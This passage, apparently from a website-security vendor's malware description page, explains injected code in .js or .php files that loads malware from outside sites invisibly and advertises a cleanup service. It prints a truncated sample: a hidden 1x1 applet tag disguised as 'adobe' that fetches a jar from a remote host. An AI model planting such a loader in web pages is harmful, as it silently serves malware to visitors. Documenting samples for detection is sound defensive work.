(and many other domains).
This is used to load malware from external web sites while not being visible to the user.
Any web site
This malware is generally hidden on .js or .php files without heavy encoding. Sign up here to get it cleaned: http://sucuri.net/signup
Malware dump (sample of malware):
<applet name="adobe" code="adobeflash.class" archive="http://www.site.com/flash.jar" width="1" height="1"...